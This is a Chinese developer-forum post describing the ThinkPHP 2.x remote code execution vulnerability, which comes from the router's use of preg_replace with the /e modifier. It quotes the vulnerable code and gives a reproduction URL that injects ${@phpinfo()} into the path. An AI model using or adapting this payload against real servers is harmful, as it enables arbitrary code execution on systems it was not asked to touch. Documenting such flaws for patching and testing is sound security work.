讨论社区 / 日志 / 帖子详情

Thinkphp 2.x rce

2023-03-29 23:03:03

130

Thinkphp 2.x rce

Thinkphp简介

Thinkphp 是一个开源的，快速、简单的面向对象的轻量级PHP开发框架

漏洞影响版本

Thinkphp 2.x

漏洞概述

ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由：$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞，也存在这个漏洞。

漏洞复现

http://{{BaseUrl}}/index.php?s=/a/a/a/${@phpinfo()}

在这里插入图片描述

上一页：Thinkphp6如何跨域请求

下一页：thinkphp6+layui响应式后台管理框架

回帖

全部回帖（{{commentCount}}）

{{item.like > 0 ? item.like : '点赞'}} {{item.comment_content_show ? '取消' : '回复'}} 删除

回帖

{{reply.like > 0 ? reply.like : '点赞'}} {{reply.comment_content_show ? '取消' : '回复'}} 删除

回帖

收起

没有更多啦~

发帖

一个专属于OneKeyAdmin的技术交流平台，记录OneKeyAdmin开发者的成长与进步。

主题帖

6221

回帖数

143

文章

回帖

文章

粉丝

1 WordPress Rest API 入门详解

2765

2 Thinkphp5.0 获取新增数据的ID

6 Thinkphp6 的 where 查询条件 and 和 or 的操作

1837

7 thinkphp5使用数据库表锁

1624

8 Thinkphp如何查看当前是哪个版本?查看thinkphp当前版本号的三种方法

1622

9 thinkphp6 如何输出json数据

1580

10 h5网站模板_超全超实用的80个模板网站，我全部整理在这里了

1577